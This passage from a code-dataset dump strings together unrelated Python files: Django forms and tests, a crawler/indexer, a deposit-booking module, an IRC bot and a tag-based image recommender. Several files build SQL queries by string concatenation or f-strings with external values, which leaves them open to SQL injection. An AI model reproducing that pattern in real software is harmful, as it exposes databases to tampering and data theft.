= forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n class Meta:\n model = models.RotationalConstants\n exclude = (\"rot_id\",\"state\",)\n\nclass TabulatedVibrationsForm(ModelForm):\n sym_type = forms.CharField(required=False)\n eigenvectors = forms.CharField(required=False)\n class Meta:\n model = models.TabulatedVibrations\n exclude = (\"vib_id\", \"vibanalysis_armonic\",)\n","sub_path":"oacagliari/qchitool/modelforms/modelforms (copia).py","file_name":"modelforms (copia).py","file_ext":"py","file_size_in_byte":4673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"72720336","text":"import xml.etree.ElementTree as ET\nimport re\n\nclass BaseLabelExtractor:\n def __init__(self, *args, **kwargs):\n pass\n\n def get_labels(self, data):\n ans = []\n for f in data:\n ans.append(self.extract_label(f))\n return ans\n\nclass ProblemExtractor(BaseLabelExtractor):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def extract_label(self, item):\n r = r'(.+)-(.+)-(\\d+).*'\n m = re.search(r, item)\n return m.group(2)\n\nclass VerdictExtractor(BaseLabelExtractor):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.xml = kwargs.get(\"xml\", \"\")\n self.root = ET.parse(self.xml).getroot()\n self.teams = {}\n for session in self.root[0][1:]:\n #print(session.attrib['alias'])\n tasks = []\n for problem in session:\n task = []\n for solution in 
problem:\n task.append(solution.attrib['accepted']) \n tasks.append(task)\n self.teams[session.attrib[\"alias\"]] = tasks \n\n\n def extract_label(self, item):\n r = r'(.+)-(.+)-(\\d+)\\..*'\n m = re.search(r, item)\n print(item)\n print(m.group(1))\n print(m.group(2))\n print(m.group(3))\n print(self.teams[m.group(1)])\n print(self.teams[m.group(1)][ord(m.group(2))-ord('a')])\n print(self.teams[m.group(1)][ord(m.group(2))-ord('a')][int(m.group(3)) - 1])\n print('-'*40)\n return self.teams[m.group(1)][ord(m.group(2))-ord('a')][int(m.group(3)) - 1]","sub_path":"label_extractor.py","file_name":"label_extractor.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"289312524","text":"import requests\nfrom envparse import env\nfrom urllib import request, parse\nfrom textblob import TextBlob, blob, Word\nfrom bs4 import BeautifulSoup as soup\nimport MySQLdb\nimport random\n\n\ndef indexUrl():\n # Connect to MySQL DB\n env.read_envfile()\n db = MySQLdb.connect(env.str(\"db_ip\"), env.str(\"db_user\"), env.str(\"db_pass\"), env.str(\"db_schema\"))\n connect = db.cursor()\n\n # Set target url\n connect.execute(\"SELECT address FROM crawled_urls WHERE parsed=1 ORDER BY id ASC LIMIT 1;\")\n results = connect.fetchone()\n target = results[0]\n updateUrl = \"UPDATE crawled_urls SET parsed = 2 WHERE address = '\" + target + \"';\"\n\n # Check for HTTP errors\n try:\n response = requests.get(target)\n except requests.exceptions.ConnectionError as e:\n connect.execute(updateUrl)\n\n # Get page\n site = None\n parsed = None\n try:\n site = request.urlopen(target).read()\n parsed = soup(site, 'html.parser')\n except:\n connect.execute(updateUrl)\n\n # Clean up HTML\n try:\n for tag in parsed.find_all(['script', 'style']):\n tag.replaceWith('')\n clean = parsed.get_text()\n blobText = TextBlob(clean)\n except:\n connect.execute(updateUrl)\n\n # Get NOUNS from text\n words = list()\n keyWords = ''\n try:\n for word, tag in blobText.tags:\n if tag == 'NN':\n words.append(word.lemmatize())\n except:\n connect.execute(updateUrl)\n try:\n for item in random.sample(words, 20):\n word = Word(item)\n if \"'\" not in word:\n keyWords = keyWords + ' ' + word.singularize()\n try:\n # Insert page into database\n insertSite = \"INSERT INTO indexed_urls(address, title, keywords) VALUES ('\" + target + \"','\" + parsed.title.string + \"','\" + keyWords + \"');\"\n connect.execute(insertSite)\n print(\"Done - \" + target)\n except:\n print(\"Error in gathered data on page - \" + target)\n except:\n print(\"Not enough data\")\n connect.execute(updateUrl)\n\n # Set URL to indexed and close connections\n connect.execute(updateUrl)\n db.commit()\n connect.close()\n db.close()\n\n # Back at it again\n indexUrl()\n\nindexUrl()\n\n","sub_path":"indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"315318016","text":"import json\nimport os\nimport subprocess\nimport time\n\nfrom django.test import Client\nfrom mock import patch\n\nfrom questionnaire.models import Questionnaire, Section\nfrom questionnaire.tests.base_test import BaseTest\n\n\nclass ExportSectionToPDFViewTest(BaseTest):\n def setUp(self):\n self.client = Client()\n self.user = self.create_user(group=self.DATA_SUBMITTER, country=\"Uganda\", region=\"AFRO\")\n self.login_user()\n\n self.questionnaire = Questionnaire.objects.create(name=\"JRF 2013 
Core English\",\n description=\"From dropbox as given by Rouslan\", year=2013)\n self.section_1 = Section.objects.create(title=\"Reported Cases of Selected Vaccine Preventable Diseases (VPDs)\",\n order=1,\n questionnaire=self.questionnaire, name=\"Reported Cases\")\n\n def test_get(self):\n meta = {'HTTP_REFERER': 'http://', 'HTTP_HOST': 'somehost'}\n\n mock_time = '123'\n with patch.object(time, 'time', return_value=mock_time):\n with patch.object(subprocess, 'Popen') as mock_popen:\n response = self.client.get(\"/export-section/\", **meta)\n\n self.assertEqual(200, response.status_code)\n content = json.loads(response.content)\n self.assertEqual(1, len(content.keys()))\n self.assertEqual('filename', content.keys()[0])\n\n file_name = 'eJRF_export_%s.pdf' % mock_time\n export_file_name = 'export/' + file_name\n self.assertTrue(file_name, content['filename'])\n\n session_id = response.client.cookies['sessionid'].value\n url = (meta['HTTP_REFERER'] + '?printable=1')\n domain = meta['HTTP_HOST']\n phantomjs_script = 'questionnaire/static/js/export-section.js'\n command = [\"phantomjs\", phantomjs_script, url, export_file_name, session_id, domain, \"&> /dev/null &\"]\n\n mock_popen.assert_called_once_with(command)\n\n def test_login_required(self):\n self.assert_login_required('/export-section/')\n\n\nclass DownloadSectionPDFViewTest(BaseTest):\n def setUp(self):\n self.client = Client()\n self.user = self.create_user(group=self.DATA_SUBMITTER, country=\"Uganda\", region=\"WHO\")\n self.login_user()\n\n def test_get(self):\n filename = \"haha.pdf\"\n os.system(\"echo 'haha' > export/%s\" % filename)\n\n response = self.client.get('/export-section/%s' % filename)\n self.assertEqual('attachment; filename=%s' % filename, response.get('Content-Disposition'))\n self.assertFalse(os.path.isfile('export/' + filename))\n\n def test_login_required(self):\n self.assert_login_required('/export-section/hahaha.pdf')\n","sub_path":"questionnaire/tests/views/test_export_sections_to_pdf.py","file_name":"test_export_sections_to_pdf.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"505512686","text":"import acm\nfrom at import addInfo\nfrom at_logging import getLogger\nfrom PS_Functions import get_pb_fund_counterparty\nfrom PB_Saxo_general import (\n get_alias_from_alias_or_cp,\n get_saxo_depo_portfolio,\n get_saxo_cp,\n )\n\nCALL_ACCNT_TMPL = \"%(curr)s/SAXO_%(alias)s_CallAcc\"\nCALL_IMARGIN_TMPL = \"%(curr)s/SAXO_%(alias)s_InitMarg\"\n\nDEPO_CALL_ACCOUNT_TYPE = \"CALL_ACCOUNT\"\nDEPO_MARGIN_ACCOUNT_TYPE = \"MARGIN_ACCOUNT\"\nDEPO_TYPES = (\n DEPO_CALL_ACCOUNT_TYPE,\n DEPO_MARGIN_ACCOUNT_TYPE,\n )\n\nLOGGER = getLogger(__name__)\n\n\ndef check_depos_existence(alias, currency, from_date):\n LOGGER.info(\"Checking depos...\")\n for depo_type in DEPO_TYPES:\n create_deposit(alias, currency, depo_type, from_date)\n\n\ndef get_account_name(alias, curr, depo_type):\n alias = get_alias_from_alias_or_cp(alias)\n if depo_type == \"CALL_ACCOUNT\":\n name_acc = \"CallAcc\"\n else:\n name_acc = \"InitMargin\"\n return curr + '/' + \"SAXO\" + \"_\" + alias + \"_\" + name_acc\n\n\ndef get_call_account_name(alias_or_cp, curr):\n alias = get_alias_from_alias_or_cp(alias_or_cp)\n return CALL_ACCNT_TMPL % {'curr':curr, 'alias':alias}\n\n \ndef get_imargin_account_name(alias_or_cp, curr):\n alias = get_alias_from_alias_or_cp(alias_or_cp)\n return CALL_IMARGIN_TMPL % {'curr':curr, 'alias':alias}\n\n\ndef 
get_call_account(alias_or_cp, curr):\n name = get_call_account_name(alias_or_cp, curr)\n return _get_ins(name)\n\n\ndef get_imargin_account(alias_or_cp, curr):\n name = get_imargin_account_name(alias_or_cp, curr)\n return _get_ins(name)\n\n\ndef _get_ins(name):\n ins = None\n try:\n ins = acm.FInstrument[name]\n if not ins:\n raise RuntimeError(\"Nonexisting instrument: '%s'\" % name)\n trades = _ins_trades(ins)\n if len(trades) != 2:\n raise RuntimeError(\"Call Account '%s' trades error. Expected 2 trades, found %d\"\n % (name, len(trades)))\n except Exception:\n ins = None\n return ins\n\n\ndef _get_depo_name(alias, depo_type, curr):\n if depo_type == \"CALL_ACCOUNT\":\n return get_call_account_name(alias, curr)\n else:\n return get_imargin_account_name(alias, curr)\n\n\ndef _get_depo(alias, depo_type, curr):\n name = _get_depo_name(alias, depo_type, curr)\n return _get_ins(name)\n\n\ndef _ins_trades(instr):\n trades = [t for t in instr.Trades() if t.Status() not in ('Simulated', 'Void', 'Terminated')]\n return trades\n\n\ndef create_deposit(alias, currency, depo_type, from_date):\n\n name = _get_depo_name(alias, depo_type, currency)\n ins = acm.FInstrument[name]\n if ins:\n trds_size = len(_ins_trades(ins))\n if trds_size == 2:\n return ins\n elif trds_size > 0:\n raise RuntimeError(\"Invalid number of call account '%s' trades. Expected 2, found: %d\"\n % (ins.Name(), trds_size))\n\n # creating new deposits (4) and their trades here\n\n curr = acm.FCurrency[currency]\n cal = curr.Calendar()\n day_count_method = curr.Legs()[0].DayCountMethod()\n cparty = get_pb_fund_counterparty(alias)\n end_date = cal.AdjustBankingDays(from_date, 20)\n next_month = acm.Time.FirstDayOfMonth(acm.Time.DateAddDelta(from_date, 0, 1, 0))\n\n # can't use transaction while creating 2 trades in transaction\n # since validation rule would change one of the portfolios to Graveyard\n # acm.BeginTransaction()\n try:\n if not ins:\n \n LOGGER.info(\"Creating depo: '%s'\", name)\n \n ins = acm.FDeposit()\n ins.Name(name)\n ins.Currency(curr)\n ins.ContractSize(1)\n ins.DateFrom(from_date)\n ins.Otc(True)\n ins.OpenEnd('Open End')\n ins.PayOffsetMethod('Business Days')\n ins.PriceFindingChlItem(\n acm.FChoiceList.Select('list = \"PriceFindingGroup\" and name = \"Close\"')[0])\n ins.SpotBankingDaysOffset(0)\n ins.ShortDividendFactor(1)\n ins.ValuationGrpChlItem(\n acm.FChoiceList.Select('list = \"ValGroup\" and name = \"AC_GLOBAL_Funded\"')[0])\n ins.QuoteType('Clean')\n ins.Quotation('Clean')\n ins.OpenEnd('Open End')\n ins.ExpiryDate(end_date)\n ins.MinimumPiece(100000000)\n ins.RoundingSpecification('Rounding_FX_2Dec')\n\n\n\n leg = ins.CreateLeg(False)\n # leg = acm.FLeg()\n leg.PayCalendar(cal)\n leg.ResetCalendar(cal)\n leg.Currency(curr)\n leg.Decimals(11)\n leg.FloatRateFactor(1)\n leg.FixedRate(0)\n leg.NominalFactor(1)\n leg.FixedCoupon(True)\n leg.PayLeg(False)\n leg.DayCountMethod(day_count_method)\n leg.NominalAtEnd(True)\n leg.Rounding('Normal')\n leg.RollingPeriod(\"1m\")\n leg.EndPeriodUnit(\"Days\")\n leg.ResetDayOffset(0)\n leg.ResetType(\"Weighted\")\n leg.ResetPeriod(\"1d\")\n leg.ResetDayMethod(\"Following\")\n leg.RollingPeriodBase(next_month)\n leg.PayDayMethod(\"Following\")\n leg.Reinvest(True)\n\n leg.StartDate(from_date)\n leg.EndDate(end_date)\n leg.LegType('Call Fixed Adjustable')\n leg.StrikeType(\"Absolute\")\n\n ins.RegisterInStorage()\n leg.Instrument(ins)\n # leg.Commit()\n\n ins.Commit()\n\n\n addInfo.save(ins, \"CE Bankruptcy\", \"YES\")\n\n if not ins.Trades():\n\n 
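# two offsetting trades are booked: quantity +1 into the desk's depo portfolio and a -1 clone against the client counterparty\n 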
LOGGER.info(\"Booking depo trades...\")\n \n trade = acm.FTrade()\n trade.Instrument(ins)\n trade.Portfolio(get_saxo_depo_portfolio())\n trade.Currency(curr)\n trade.Quantity(1)\n trade.Counterparty(get_saxo_cp())\n trade.Acquirer(acm.FInternalDepartment['PRIME SERVICES DESK'])\n trade.ValueDay(from_date)\n trade.AcquireDay(from_date)\n trade.TradeTime(from_date)\n trade.Status(\"BO Confirmed\")\n trade.Trader(acm.User())\n\n trade.RegisterInStorage()\n trade.AdditionalInfo().Funding_Instype(\"Call Prime Brokerage Funding\")\n trade.Commit()\n\n acc_name = get_account_name(alias, currency, depo_type)\n addInfo.save(trade, 'Account_Name', acc_name)\n\n trade2 = trade.Clone()\n trade2.Counterparty(cparty)\n trade2.ValueDay(from_date)\n trade2.AcquireDay(from_date)\n trade2.TradeTime(from_date)\n trade2.Quantity(-1)\n trade2.RegisterInStorage()\n trade2.AdditionalInfo().Funding_Instype(\"Call Prime Brokerage Funding\")\n trade2.Commit()\n addInfo.save(trade2, 'Account_Name', acc_name)\n \n LOGGER.info(\"\\tTrades booked: %d, %d\", trade.Oid(), trade2.Oid())\n\n # acm.CommitTransaction()\n except Exception as exc:\n # acm.AbortTransaction()\n LOGGER.exception(\"Instrument '%s' not created: %s\", name, exc)\n raise\n \n return ins\n\n\n# print create_deposit(\"MAP110\", \"GBP\", \"CALL_ACCOUNT\", \"2017-06-06\").Name()\n","sub_path":"Python modules/PB_Saxo_deposit.py","file_name":"PB_Saxo_deposit.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"403183672","text":"'''\nchannelmodule for #pony.ql\n'''\nimport willie\nfrom random import choice\nimport datetime\nimport requests\nimport re\nimport urllib.request as urllib2\n'''import urllib2'''\nimport random\n\n@willie.module.commands('quakecon')\ndef quakecon(bot, trigger):\n now = datetime.datetime.now() \n qcon = datetime.datetime(2016, 8, 4, 10)\n delta = qcon - now\n if delta.days < 6:\n hours, remainder = divmod(delta.seconds, 3600)\n minutes, seconds = divmod(remainder, 60) \n output = \"{days} days, {hours} hours, {minutes} minutes, and {seconds} seconds until QuakeCon!\".format(days=delta.days, hours=hours, minutes=minutes, seconds=seconds)\n else:\n output = \"%s days until QuakeCon!\" % delta.days\n bot.say(output)\n\n@willie.module.commands('blizzcon')\ndef blizzcon(bot, trigger):\n now = datetime.datetime.now()\n target = datetime.datetime(2015, 11, 6, 0)\n delta = target - now\n if delta.days < 7:\n hours, remainder = divmod(delta.seconds, 3600)\n minutes, seconds = divmod(remainder, 60)\n output = \"{days} days, {hours} hours, {minutes} minutes, and {seconds} seconds until BlizzCon!\".format(days=delta.days, hours=hours, minutes=minutes, seconds=seconds)\n else:\n output = \"%s days until BlizzCon!\" % delta.days\n bot.say(output)\n\n@willie.module.commands('zen')\ndef zen(bot, trigger):\n bot.say(requests.get(\"https://api.github.com/zen\").text)\n \n@willie.module.commands('whatgameisthayacurrentlyplaying')\ndef whatgameisthayacurrentlyplaying(bot, trigger):\n bot.say(\"not playing, just botting.\")\n\n@willie.module.commands('nfact')\ndef nfact(bot, trigger):\n bot.say(requests.get(\"http://numbersapi.com/random\").text)\n\n@willie.module.commands('42')\ndef fourtytwo(bot, trigger):\n bot.say(requests.get(\"http://numbersapi.com/42\").text)\n\n@willie.module.commands('tfact')\ndef today(bot, trigger):\n month = datetime.datetime.now().month\n day = datetime.datetime.now().day\n 
bot.say(requests.get(\"http://numbersapi.com/%s/%s/date\" % (month, day)).text)\n\n@willie.module.commands('askreddit', 'asscredit')\ndef ask(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n bot.say(choice(requests.get(\"http://www.reddit.com/r/askreddit.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"][\"title\"])\n\n@willie.module.commands('shower')\ndef shower(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n bot.say(choice(requests.get(\"http://www.reddit.com/r/showerthoughts.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"][\"title\"])\n\n@willie.module.commands('5050')\ndef fifty(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n pick = choice(requests.get(\"http://www.reddit.com/r/fiftyfifty.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"]\n bot.say(\"%s - %s\" % (pick[\"title\"], pick[\"url\"]))\n\n@willie.module.commands('til')\ndef til(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n pick = choice(requests.get(\"http://www.reddit.com/r/todayilearned.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"]\n bot.say(\"%s\" % (pick[\"title\"]))\n\n@willie.module.commands('beat')\ndef beat(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n pick = choice(requests.get(\"http://www.reddit.com/r/beatheads.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"]\n bot.say(\"%s\" % (pick[\"url\"]))\n \n@willie.module.commands('kadse', 'kazachstan', 'c@')\ndef kadse(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n pick = choice(requests.get(\"http://www.reddit.com/r/catgifs.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"]\n bot.say(\"%s\" % (pick[\"url\"]))\n\n@willie.module.commands('newbeat','latest')\ndef newbeat(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n pick = choice(requests.get(\"http://www.reddit.com/r/beatheads/new.json?limit=1\", headers=header).json()[\"data\"][\"children\"])[\"data\"]\n bot.say(\"%s\" % (pick[\"url\"]))\n\n@willie.module.commands('tifu')\ndef tifu(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n pick = choice(requests.get(\"http://www.reddit.com/r/tifu.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"]\n bot.say(\"%s - %s\" % (pick[\"title\"], pick[\"url\"]))\n\n@willie.module.commands('rather')\ndef rather(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n bot.say(choice(requests.get(\"http://www.reddit.com/r/wouldyourather.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"][\"title\"])\n\n@willie.module.commands('youporn', 'yp')\ndef youporn(bot, trigger):\n foundComment = False\n opener = urllib2.build_opener()\n opener.addheaders.append(('Cookie', 'age_verified=1'))\n\n for x in range(7):\n f = opener.open(\"http://www.youporn.com/random/video/\")\n htmlSource = f.read()\n f.close()\n comments = re.findall(b'
<div class=\"comment-text\">((?:.|\\\\n)*?)</div>', htmlSource) # NOTE: the 'comment-text' container tag and the <br/> tag below are assumed placeholders\n if len(comments) == 0:\n continue\n randomcomment = random.choice(comments).replace(b\"<br/>
    \", b\"\")\n bot.say(randomcomment, max_messages=2)\n foundComment = True\n break\n if not foundComment:\n bot.say(\"No comment found, please retry\")\n\n@willie.module.commands('jpg','jpeg')\ndef jpg(bot, trigger):\n bot.say(\"Do I look like I know what a JPEG is? https://youtu.be/QEzhxP-pdos\")\n\n@willie.module.commands('fap','fapathon')\ndef fap(bot, trigger):\n bot.say(\"https://i.imgur.com/9ciSNye.gifv\")\n\n@willie.module.commands('rd')\ndef reverseDict(bot, trigger):\n word = trigger.group(2)\n if not word:\n bot.say(\"syntx: .rd \")\n else:\n result = requests.get(\"http://api.datamuse.com/words\", params={\"rd\": word}).json()\n if result:\n reply = \"Possible words matching '%s': %s\" % (word, \", \".join(w[\"word\"] for w in result[0:5]))\n bot.say(reply)\n \n@willie.module.commands(\"lenny\")\ndef lenny(bot, trigger):\n bot.say(u\"( ͡° ͜ʖ ͡°)\")\n \n@willie.module.commands(\"wowalert\")\ndef wowalert(bot, trigger):\n bot.say(\"http://launcher.worldofwarcraft.com/alert (US); http://status.wow-europe.com/en/alert (EU)\")\n","sub_path":"heh.py","file_name":"heh.py","file_ext":"py","file_size_in_byte":6017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"349179382","text":"\nfrom django.conf.urls.defaults import *\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\nfrom django.views.generic.base import TemplateView\nfrom robintechsite.core import views\n\nurlpatterns = patterns('',\n url(r'^$', TemplateView.as_view(template_name ='home.html'), name='core-home'),\n url(r'^about', TemplateView.as_view(template_name ='about.html'), name='core-about'),\n url(r'^experience', views.ExperienceView.as_view(), name='core-experience'),\n url(r'^contact$', views.ContactView.as_view(), name='core-contact'),\n url(r'^sitemap', views.SitemapView.as_view(), name='core-sitemap'),\n\n)\n","sub_path":"robintechsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"340592247","text":"#!/usr/bin/python\n# Filename : input-float.py\n\ndef main():\n\t# membuat prompt untuk tipe data float\n\tbilangan_riil = float(input(\"masukkan bilangan rill :\"))\n\n\t# menggunakan variabel untuk perhitungan\n\thasil = bilangan_riil * 2\n\n\t# menampilkan nilai variabel\n\tprint(\"Bilangan yang dimasukkan adalah %.2f\" % bilangan_riil)\n\tprint(\"%.2f * 2 = %.2f\" % (bilangan_riil,hasil))\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"input-float.py","file_name":"input-float.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"461223671","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport platform\r\nfrom random import choice\r\nfrom string import ascii_letters\r\nfrom subprocess import Popen, PIPE\r\nfrom logging import *\r\nbasicConfig(format=u'[LINE:%(lineno)d] # %(levelname)-8s [%(asctime)s] %(message)s', level=DEBUG)\r\n\r\n\r\ndef execute(proc, print_output=True):\r\n p = Popen(proc, shell=True, stdout=PIPE, stderr=PIPE)\r\n out = p.stdout.read().decode('utf-8')\r\n err = p.stderr.read().decode('utf-8')\r\n out += err\r\n if print_output: debug(out)\r\n p.wait(timeout=20)\r\n return out, p.returncode\r\n\r\n\r\ndef is_64bit():\r\n return platform.machine().endswith('64')\r\n\r\n\r\ndef mount_share():\r\n if \"192.168.71.111/requests/\" in execute(\"mount 
-l\")[0]:\r\n debug('kca already mounted')\r\n else:\r\n if not os.path.exists(\"/mnt/kca\"):\r\n os.mkdir(\"/mnt/kca/\")\r\n execute(\"mount -t cifs //192.168.71.111/requests/Fazlyev/autotest/msca/ /mnt/kca/ \\\r\n -o user=user,password=password,rw,file_mode=0777,dir_mode=0777\")\r\n assert \"192.168.71.111/requests/\" in execute(\"mount -l\")[0]\r\n\r\n\r\ndef random_folder_in_kca(action, folder=None):\r\n if action == \"create\":\r\n folder = (''.join(choice(ascii_letters) for i in range(15)))\r\n if os.path.exists(\"/mnt/kca/requests/{0}\".format(folder)): os.rmdir(\"/mnt/kca/requests/{0}\".format(folder))\r\n os.mkdir(\"/mnt/kca/requests/{0}\".format(folder))\r\n return folder\r\n elif action == \"remove\":\r\n os.rmdir(\"/mnt/kca/requests/{0}\".format(folder))\r\n\r\n\r\ndef set_rng(rng=\"unixdev\"):\r\n out, returncode = execute(\"/opt/itcs/bin/rngcmgr default --rng {0}\".format(rng))\r\n assert returncode == 0\r\n assert \"Successed\" in out\r\n","sub_path":"windows_helper/os_system.py","file_name":"os_system.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"379006892","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 05 09:35:30 2019\r\n\r\n@author: makoto_\r\n\"\"\"\r\n\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\nimport numpy as np\r\n\r\npath = os.path.dirname(os.path.abspath(__file__))\r\n\r\ndef main():\r\n (n) = np.loadtxt(path+'/n.dat').astype(int)\r\n\r\n Adj = np.loadtxt(path+'/Graph_adjMat.dat')\r\n G = nx.from_numpy_matrix(Adj, create_using=nx.MultiDiGraph())\r\n # pos = nx.spring_layout(G, iterations=200)\r\n pos = nx.circular_layout(G)\r\n\r\n plt.figure()\r\n labels = {}\r\n for i in range(n):\r\n labels[i] = r\"{0}\".format(i+1)\r\n\r\n nx.draw(G, pos, font_size=15, labels=labels, node_color=\"lightblue\", edgecolors=\"#6fbbd3\", node_size=450)\r\n # nx.draw_networkx_nodes(G, pos, node_size=20, alpha=1.0, node_color=\"lightblue\")\r\n # nx.draw_networkx_edges(G, pos, width=2)\r\n # nx.draw_networkx_labels(G, pos, labels, font_size=8)\r\n\r\n plt.savefig(path+\"/figs/graph_n20_labeled.png\")\r\n plt.savefig(path+\"/figs/graph_n20_labeled.pdf\")\r\n plt.show(block=False)\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"labelToAge-Graph.py","file_name":"labelToAge-Graph.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"394865050","text":"import sqlite3\nfrom collections import Counter \n\n#GETS THE N TOP RECCOMENDATIONS (BY K NEAREST NEIGHBORS AND COSINE SIMILARITY METRIC)\n#IF NO FAVOURITES FOUND FOR USER, RETURNS FALSE\ndef getNRecommendations(user_id, source, n):\n db = sqlite3.connect(\"scrapedlinks.sqlite\")\n cursor = db.cursor()\n\n #Fetch information from the user's favourited images and tags\n sql = \"\"\n if (source == \"gelbooru\"):\n sql = f\"SELECT tags,link FROM sauceusers WHERE user_id={user_id}\"\n else:\n sql = sql = f\"SELECT tags,link FROM sauce34users WHERE user_id={user_id}\"\n cursor.execute(sql)\n res = cursor.fetchall()\n if (len(res) == 0):\n return False\n\n #Keep track of the most commonly occurring tags in the user's favourite images\n tagStr = \"\"\n #keep record of the user's favourited images\n userLinkList = []\n\n #Iterate through all the user's favourite images and their respective tags\n for tags, link in res: \n tagStr += tags\n tagStr += \" \"\n 
userLinkList.append(link)\n tagList = tagStr.split()\n #Fetch the three most commonly occurring tags (used for preliminary filtering)\n word1 = Counter(tagList).most_common(3)[0][0]\n word2 = Counter(tagList).most_common(3)[1][0]\n word3 = Counter(tagList).most_common(3)[2][0]\n\n #Create a user profile vector with the number of occurrences of each tag in all of the user's favourite images\n userTagCount = dict(Counter(tagList))\n\n #Fetch all of the images containing any of the user's 3 most commonly occurring tags\n if (source == \"gelbooru\"):\n sql = f\"SELECT * from sauce WHERE tags LIKE '%{word1}%' OR tags LIKE '%{word2}%' OR tags LIKE '%{word3}%'\"\n else:\n sql = f\"SELECT * from sauce34 WHERE tags LIKE '%{word1}%' OR tags LIKE '%{word2}%' OR tags LIKE '%{word3}%'\"\n cursor.execute(sql)\n res = cursor.fetchall()\n\n #Holds evaluation metrics\n linkScores = []\n linkMap = []\n\n for elem in res:\n link = elem[0]\n #Check if image is already in user's favourites\n if link in userLinkList:\n continue\n tags = elem[1]\n #We generate a tag count vector for all the tags of each image\n linkTagCount = dict(Counter(tags.split()))\n\n #Each image will have a tag vector that looks like {\"tag1\": 1, \"tag2\": 1, \"tag3\": 1, ....}\n #The user profile vector will also look like {\"tag1\": (some number), \"tag2\": (some number) ...}\n\n #This algorithm will treat each tag as an axis in Cartesian space, and we will treat both dictionaries as vectors.\n #We will use the cosine value of the angle between the vectors as a similarity metric\n dot_product = sum(userTagCount[tag] * linkTagCount.get(tag, 0) for tag in userTagCount)\n \n userTagMag = pow(sum(userTagCount[tag] * userTagCount[tag] for tag in userTagCount), 0.5)\n linkTagMag = pow(sum(linkTagCount[tag] * linkTagCount[tag] for tag in linkTagCount), 0.5)\n\n #manually compute cosine sim\n cosine_sim = dot_product/(userTagMag * linkTagMag)\n #Maps links to a cosine similarity score for reverse lookup\n linkMap.append([link, cosine_sim])\n #We will only append the cosine sim scores so we have a single dimension list that can be quickly sorted\n linkScores.append(cosine_sim)\n linkScores.sort(reverse=True)\n \n links = []\n if(n >= len(linkScores)):\n n = len(linkScores) - 1\n \n for score in linkScores[0:n]:\n for pair in linkMap:\n if (pair[1] == score):\n links.append(pair[0])\n cursor.close()\n db.commit()\n db.close()\n return list(dict.fromkeys(links))[0:n]\n\n","sub_path":"cogs/imagereccomend.py","file_name":"imagereccomend.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"270908688","text":"import random\n\nprint(\"Welcome to die\")\n\ndef diceRoll():\n die1 = random.randint(1,6)\n die2 = random.randint(1,6)\n sum = die1 + die2\n print(\"Die 1: %d, Die 2: %d, You move: %d spaces\" % (die1, die2, sum))\n if die1 == die2:\n print(\"Doubles\")\n diceRoll()\n else:\n print(\"Next Player's Turn\")\n\ndiceRoll()\n","sub_path":"python/labs/rock-paper-scissors/random-numbers.py","file_name":"random-numbers.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"607047855","text":"# coding=utf-8\nimport sys\n\nfrom conexion import Conexion\nfrom datetime import date, datetime\n\nclass Licencia(object):\n\t\n\t_cambios = True\n\t_nuevo = True\n\t_id = int()\n\t_id_empleado = int()\n\t_desde = str()\n\t_hasta = str()\n\t_dias_tomados = int()\n\t_tipo 
